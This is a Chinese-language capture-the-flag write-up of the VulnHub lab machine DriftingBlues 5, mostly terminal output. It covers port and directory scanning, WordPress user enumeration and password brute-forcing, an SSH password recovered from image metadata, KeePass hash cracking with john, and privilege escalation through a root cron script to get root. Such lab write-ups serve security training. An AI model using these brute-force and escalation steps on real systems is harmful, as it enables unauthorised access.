Vulnhub之DriftingBlues 5靶机详细测试过程(得到root shell)
DriftingBlues 5
靶机信息
名称: DriftingBlues: 5
地址:
https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova
识别IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:a6:7d:47 1 60 PCS Systemtechnik GmbH
192.168.56.128 08:00:27:12:bf:76 1 60 PCS Systemtechnik GmbH
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.128 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-19 02:50 EDT
Nmap scan report for 192.168.56.128
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:12:BF:76 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NMAP扫描结果表明目标主机有2个开放端口:22(SSH),80(HTTP)
Get Foothold
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ curl http://192.168.56.128/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.128 Port 80</address>
</body></html>
目标主机没有robots.txt文件。
──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ nikto -h http://192.168.56.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.128
+ Target Hostname: 192.168.56.128
+ Target Port: 80
+ Start Time: 2023-05-19 02:53:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.128/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-05-19 02:54:42 (GMT-4) (65 seconds)
nikto工具运行结果表明目标主机运行wordpress,在尝试扫描wordpress用户名和插件之间,看有无其他的目录:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ gobuster dir -u http://192.168.56.128 -oN nmap_full_scan -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.bak,.js,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.128
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: bak,txt,php,html,js
[+] Timeout: 10s
===============================================================
2023/05/19 02:56:08 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.128/]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.128/wp-content/]
/license.txt (Status: 200) [Size: 19915]
/wp-login.php (Status: 200) [Size: 6675]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.128/wp-includes/]
/readme.html (Status: 200) [Size: 7278]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.128/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.56.128/wp-login.php?action=register]
/server-status (Status: 403) [Size: 279]
Progress: 1322241 / 1323366 (99.91%)
===============================================================
2023/05/19 03:00:52 Finished
===============================================================
gobuster工具没有扫描出更有用的的目录或者文件。
─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -e u,p
[+] abuzerkomurcu
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.128/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] satanic
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gill
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] collins
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gadd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
wpscan工具扫描出用户名,(备注:没有扫描出有漏洞的插件)
─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -U abuzerkomurcu -P /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
用经典的rockyou.txt字典没有破解出来,考虑到目标主机页面内容较多,是否密码存在页面中,因此用cewl工具生成字典:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ cewl -d 3 http://192.168.56.128 -w dict
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
─(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wpscan --url http://192.168.56.128 -U users.dict -P dict
[!] Valid Combinations Found:
| Username: gill, Password: interchangeable
但是只有gill的密码被破解出来,利用该密码登录,发现gill并不是管理员用户,在媒体中发现了一张图片,这张图片并没有出现在前端页面中,比较可疑,将其下载到Kali Linux本地。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ exiftool dblogo.png
ExifTool Version Number : 12.44
File Name : dblogo.png
Directory : .
File Size : 19 kB
File Modification Date/Time : 2023:05:19 03:31:44-04:00
File Access Date/Time : 2023:05:19 03:31:44-04:00
File Inode Change Date/Time : 2023:05:19 03:31:44-04:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 300
Image Height : 300
Bit Depth : 8
Color Type : RGB with Alpha
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Gamma : 2.2
Pixels Per Unit X : 2835
Pixels Per Unit Y : 2835
Pixel Units : meters
XMP Toolkit : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool : Adobe Photoshop CC 2018 (Windows)
Create Date : 2021:02:24 02:55:28+03:00
Metadata Date : 2021:02:24 02:55:28+03:00
Modify Date : 2021:02:24 02:55:28+03:00
Instance ID : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode : RGB
ICC Profile Name : sRGB IEC61966-2.1
Format : image/png
History Action : created, saved
History Instance ID : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed : /
Text Layer Name : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size : 300x300
Megapixels : 0.090
利用exiftool工具得到了ssh密码,利用该密码登录其SSH:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ ssh gill@192.168.56.128
The authenticity of host '192.168.56.128 (192.168.56.128)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:35: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.128' (ED25519) to the list of known hosts.
gill@192.168.56.128's password:
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gill@driftingblues:~$ id
uid=1000(gill) gid=1000(gill) groups=1000(gill)
gill@driftingblues:~$ ls -alh
total 24K
drwxr-xr-x 4 gill gill 4.0K May 19 02:33 .
drwxr-xr-x 4 root root 4.0K Feb 24 2021 ..
drwx------ 3 gill gill 4.0K May 19 02:33 .gnupg
-rwx------ 1 gill gill 2.0K Feb 24 2021 keyfile.kdbx
drwx------ 2 gill gill 4.0K Feb 24 2021 .ssh
-r-x------ 1 gill gill 1.8K Jan 3 2021 user.txt
gill@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
gill@driftingblues:~$
Privilege Escalation
在gill家目录中有文件keyfile.kdbx,肯定非常有用,将其下载到Kali Linux。
通过KeePass密码安全创建的数据文件称为KDBX文件,它们通常所说的KeePass的密码数据库。这些文件包含密码的加密数据库,其中如果用户设置一个主密码,并通过主密码访问他们,他们只能查看。当涉及到的电子邮件帐户的个人登录凭据,电子商务网站,视窗,FTP站点和其他目的的安全存储KDBX文件是很有用的。
──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ wget http://192.168.56.128:8000/keyfile.kdbx
--2023-05-19 03:36:26-- http://192.168.56.128:8000/keyfile.kdbx
Connecting to 192.168.56.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2030 (2.0K) [application/octet-stream]
Saving to: ‘keyfile.kdbx’
keyfile.kdbx 100%[============================================================================>] 1.98K --.-KB/s in 0s
2023-05-19 03:36:26 (217 MB/s) - ‘keyfile.kdbx’ saved [2030/2030]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ keepass2john keyfile.kdbx > keyfile_hash
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Driftingblues5]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt keyfile_hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre (keyfile)
1g 0:00:01:23 DONE (2023-05-19 03:38) 0.01196g/s 82.44p/s 82.44c/s 82.44C/s winston1..palomita
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
用得到的密码到下面的网站破解文件:
https://app.keeweb.info/
得到5个类似于密码的字符串,但是并不是root密码
2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde
ill@driftingblues:/tmp$ wget http://192.168.56.230:8000/pspy64
--2023-05-19 02:45:48-- http://192.168.56.230:8000/pspy64
Connecting to 192.168.56.230:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[============================================================================>] 2.96M --.-KB/s in 0.03s
2023-05-19 02:45:48 (102 MB/s) - ‘pspy64’ saved [3104768/3104768]
gill@driftingblues:/tmp$ chmod +x pspy64
gill@driftingblues:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/05/19 02:46:01 CMD: UID=0 PID=1694 | /bin/bash /root/key.sh
2023/05/19 02:46:01 CMD: UID=0 PID=1693 | /bin/sh -c /root/key.sh
2023/05/19 02:46:01 CMD: UID=0 PID=1692 | /usr/sbin/CRON -f
2023/05/19 02:46:01 CMD: UID=1000 PID=1685 | ./pspy64
2023/05/19 02:46:01 CMD: UID=0 PID=1665 |
2023/05/19 02:46:01 CMD: UID=0 PID=1585 |
2023/05/19 02:46:01 CMD: UID=1000 PID=1545 | -bash
2023/05/19 02:46:01 CMD: UID=1000 PID=1544 | sshd: gill@pts/0
2023/05/19 02:46:01 CMD: UID=1000 PID=1531 | (sd-pam)
2023/05/19 02:46:01 CMD: UID=1000 PID=1530 | /lib/systemd/systemd --user
2023/05/19 02:46:01 CMD: UID=0 PID=1527 | sshd: gill [priv]
2023/05/19 02:46:01 CMD: UID=33 PID=1238 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=1202 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=1027 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=0 PID=949 |
2023/05/19 02:46:01 CMD: UID=33 PID=846 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=806 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=805 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=777 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=743 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=541 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=33 PID=540 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=0 PID=524 | /usr/sbin/apache2 -k start
2023/05/19 02:46:01 CMD: UID=0 PID=492 | /usr/sbin/sshd -D
2023/05/19 02:46:01 CMD: UID=106 PID=488 | /usr/sbin/mysqld
2023/05/19 02:46:01 CMD: UID=0 PID=409 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2023/05/19 02:46:01 CMD: UID=0 PID=384 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2023/05/19 02:46:01 CMD: UID=104 PID=354 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/05/19 02:46:01 CMD: UID=0 PID=353 | /lib/systemd/systemd-logind
2023/05/19 02:46:01 CMD: UID=0 PID=352 | /usr/sbin/cron -f
2023/05/19 02:46:01 CMD: UID=0 PID=347 | /usr/sbin/rsyslogd -n -iNONE
2023/05/19 02:46:01 CMD: UID=101 PID=341 | /lib/systemd/systemd-timesyncd
2023/05/19 02:46:01 CMD: UID=0 PID=328 |
2023/05/19 02:46:01 CMD: UID=0 PID=327 |
2023/05/19 02:46:01 CMD: UID=0 PID=326 |
2023/05/19 02:46:01 CMD: UID=0 PID=325 |
2023/05/19 02:46:01 CMD: UID=0 PID=321 |
2023/05/19 02:46:01 CMD: UID=0 PID=320 |
2023/05/19 02:46:01 CMD: UID=0 PID=275 |
2023/05/19 02:46:01 CMD: UID=0 PID=274 |
2023/05/19 02:46:01 CMD: UID=0 PID=237 | /lib/systemd/systemd-udevd
2023/05/19 02:46:01 CMD: UID=0 PID=215 | /lib/systemd/systemd-journald
2023/05/19 02:46:01 CMD: UID=0 PID=187 |
2023/05/19 02:46:01 CMD: UID=0 PID=186 |
2023/05/19 02:46:01 CMD: UID=0 PID=184 |
2023/05/19 02:46:01 CMD: UID=0 PID=153 |
2023/05/19 02:46:01 CMD: UID=0 PID=117 |
2023/05/19 02:46:01 CMD: UID=0 PID=116 |
2023/05/19 02:46:01 CMD: UID=0 PID=114 |
2023/05/19 02:46:01 CMD: UID=0 PID=113 |
2023/05/19 02:46:01 CMD: UID=0 PID=111 |
2023/05/19 02:46:01 CMD: UID=0 PID=110 |
2023/05/19 02:46:01 CMD: UID=0 PID=108 |
2023/05/19 02:46:01 CMD: UID=0 PID=106 |
2023/05/19 02:46:01 CMD: UID=0 PID=59 |
2023/05/19 02:46:01 CMD: UID=0 PID=50 |
2023/05/19 02:46:01 CMD: UID=0 PID=49 |
2023/05/19 02:46:01 CMD: UID=0 PID=48 |
2023/05/19 02:46:01 CMD: UID=0 PID=30 |
2023/05/19 02:46:01 CMD: UID=0 PID=29 |
2023/05/19 02:46:01 CMD: UID=0 PID=28 |
2023/05/19 02:46:01 CMD: UID=0 PID=27 |
2023/05/19 02:46:01 CMD: UID=0 PID=26 |
2023/05/19 02:46:01 CMD: UID=0 PID=25 |
2023/05/19 02:46:01 CMD: UID=0 PID=24 |
2023/05/19 02:46:01 CMD: UID=0 PID=23 |
2023/05/19 02:46:01 CMD: UID=0 PID=22 |
2023/05/19 02:46:01 CMD: UID=0 PID=21 |
2023/05/19 02:46:01 CMD: UID=0 PID=20 |
2023/05/19 02:46:01 CMD: UID=0 PID=19 |
2023/05/19 02:46:01 CMD: UID=0 PID=18 |
2023/05/19 02:46:01 CMD: UID=0 PID=17 |
2023/05/19 02:46:01 CMD: UID=0 PID=16 |
2023/05/19 02:46:01 CMD: UID=0 PID=15 |
2023/05/19 02:46:01 CMD: UID=0 PID=14 |
2023/05/19 02:46:01 CMD: UID=0 PID=12 |
2023/05/19 02:46:01 CMD: UID=0 PID=11 |
2023/05/19 02:46:01 CMD: UID=0 PID=10 |
2023/05/19 02:46:01 CMD: UID=0 PID=9 |
2023/05/19 02:46:01 CMD: UID=0 PID=8 |
2023/05/19 02:46:01 CMD: UID=0 PID=6 |
2023/05/19 02:46:01 CMD: UID=0 PID=4 |
2023/05/19 02:46:01 CMD: UID=0 PID=3 |
2023/05/19 02:46:01 CMD: UID=0 PID=2 |
2023/05/19 02:46:01 CMD: UID=0 PID=1 | /sbin/init
2023/05/19 02:46:01 CMD: UID=0 PID=1696 | /bin/bash /root/key.sh
将pyps64工具上传目标主机,发现有个进程会被每分钟执行一次:
2023/05/19 02:46:01 CMD: UID=0 PID=1693 | /bin/sh -c /root/key.sh
而根目录下有/keyfolder,从/root/key.sh脚本的名字看出应该是跟密码有关,而/keyfolder为密码目录,但是当前该目录下什么都没有,因此将前面破解得到的类似于密码的字符串作为文件名创建文件,但是然后看该目录下有无变化,而且需要删掉创建的文件,说实话,这个漏洞太难发现了,也是参考别人的做法。
gill@driftingblues:/keyfolder$ cd /tmp
gill@driftingblues:/tmp$ touch 2real4surreal
gill@driftingblues:/tmp$ mv 2real4surreal /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/*
-rw-r--r-- 1 gill gill 0 May 19 03:01 /keyfolder/2real4surreal
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/buddyretard
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/closet313
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/exalted
-rw-r--r-- 1 gill gill 0 May 19 02:55 /keyfolder/fracturedocean
-rw-r--r-- 1 gill gill 0 May 19 02:56 /keyfolder/zakkwylde
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx 2 root root 4.0K May 19 03:01 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 19 03:01 2real4surreal
-rw-r--r-- 1 gill gill 0 May 19 02:55 buddyretard
-rw-r--r-- 1 gill gill 0 May 19 02:55 closet313
-rw-r--r-- 1 gill gill 0 May 19 02:55 exalted
-rw-r--r-- 1 gill gill 0 May 19 02:55 fracturedocean
-rw-r--r-- 1 gill gill 0 May 19 02:56 zakkwylde
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch buddyretard
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx 2 root root 4.0K May 19 03:02 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
gill@driftingblues:/tmp$ mv buddyretard /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx 2 root root 4.0K May 19 03:03 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 19 03:02 buddyretard
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch closet313
gill@driftingblues:/tmp$ mv closet313 /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx 2 root root 4.0K May 19 03:03 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 19 03:03 closet313
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch exalted
gill@driftingblues:/tmp$ mv exalted /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx 2 root root 4.0K May 19 03:04 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 19 03:03 exalted
gill@driftingblues:/tmp$ rm -rf /keyfolder/*
gill@driftingblues:/tmp$ touch fracturedocean
gill@driftingblues:/tmp$ mv fracturedocean /keyfolder/
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 8.0K
drwx---rwx 2 root root 4.0K May 19 03:04 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 19 03:04 fracturedocean
gill@driftingblues:/tmp$ ls -alh /keyfolder/
total 12K
drwx---rwx 2 root root 4.0K May 19 03:05 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw-r--r-- 1 gill gill 0 May 19 03:04 fracturedocean
-rw-r--r-- 1 root root 29 May 19 03:05 rootcreds.txt
gill@driftingblues:/tmp$ cat /keyfolder/rootcreds.txt
root creds
imjustdrifting31
gill@driftingblues:/tmp$
gill@driftingblues:/tmp$ su - root
Password:
root@driftingblues:~# id
uid=0(root) gid=0(root) groups=0(root)
root@driftingblues:~# cd /root
root@driftingblues:~# ls -alh
total 20K
drwx------ 2 root root 4.0K Mar 8 2021 .
drwxr-xr-x 19 root root 4.0K Feb 24 2021 ..
-rw------- 1 root root 45 Mar 8 2021 .bash_history
-rwx------ 1 root root 205 Feb 24 2021 key.sh
-r-x------ 1 root root 1.8K Dec 17 2020 root.txt
root@driftingblues:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@driftingblues:~# cat key.sh
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
echo "root creds" >> /keyfolder/rootcreds.txt
echo "" >> /keyfolder/rootcreds.txt
echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
root@driftingblues:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
